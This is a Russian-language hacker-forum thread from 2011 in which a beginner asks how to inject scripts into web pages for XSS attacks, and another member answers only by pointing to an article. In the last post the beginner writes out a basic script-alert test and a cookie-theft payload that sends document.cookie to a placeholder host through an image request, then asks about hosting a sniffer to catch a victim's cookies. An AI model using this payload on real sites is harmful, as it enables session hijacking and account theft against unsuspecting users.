как вбивать скрипты в web страници для атаки xss
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
как вбивать скрипты в web страници для атаки xss - 2011-12-13 21:09:18.800000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
юзал топики про xss и говориться что вставляете этот скрипт туда получиться так то, потом дуда сюда .. и не где не написано как это в ставить! sorry если ошибаюсь может и написано не увидал…
как или с помощью чего вставляются скрипты в web страницу ?
|
|
|
|
|
RE: как вбивать скрипты в web страници для атаки xss - 2011-12-14 14:40:15.770000
|
|
|
Xaker555
Сообщений: 180
Оценки: 0
Присоединился: 2009-10-30 11:35:12.083333
|
Читай тут XSS, если уже и там ничего не поймёшь, тогда пиши, помогу.
|
|
|
|
|
RE: как вбивать скрипты в web страници для атаки xss - 2011-12-14 15:26:14.780000
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
читал 2 статьи 1 тут, вторую на античате, с пасивной xss все сложно, xss пробовал брать с pro xaker club так и не розабрался,
|
|
|
|
|
RE: как вбивать скрипты в web страници для атаки xss - 2011-12-14 17:14:50.513333
|
|
|
sdvphwe
Сообщений: 20
Оценки: 0
Присоединился: 2011-11-29 11:16:47.123333
|
я не понимаю как сделать что бы действия все в лог записывались и я вобще правельно понимаю что тег <sсriрt />alert()</sсriрt> и
<sсriрt>alert()</sсriрt> это активная xss ?? или нет..
и еще есть вопросик ) нужен http сниффер для того что бы потом отправить жертву на него и перехвотить куки с помощью """"<sсriрt> img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cооkie; </sсriрt> и для этого нужна залить этот снифер на хостинг ? или я ошибаюсь..
если кому то кажеться вопрос глупый sorry все же новичек
|
|
|
|
|
|
